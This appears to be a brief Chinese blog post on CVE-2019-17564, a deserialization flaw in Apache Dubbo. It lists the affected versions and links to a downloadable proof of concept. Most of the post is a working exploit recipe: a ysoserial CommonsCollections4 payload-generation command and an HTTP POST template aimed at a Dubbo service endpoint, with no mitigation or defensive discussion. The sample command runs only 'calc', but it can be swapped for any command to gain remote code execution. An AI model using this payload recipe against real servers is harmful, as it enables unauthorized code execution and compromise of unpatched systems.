# CVE-2019-17564 Apache-Dubbo反序列化漏洞
影响版本:
– 2.7.0 <= Apache Dubbo <= 2.7.4
- 2.6.0 <= Apache Dubbo <= 2.6.7
- 2.5.x exp:
```
Payload生成:java -jar ysoserial.jar CommonsCollections4 "calc" POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host:yourip:8080 Payload
``` [@admin-神风](https://www.cnblogs.com/wh4am1/p/12307848.html) # POC
[点我下载](/Gr33kLibrary/download_tool/101/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容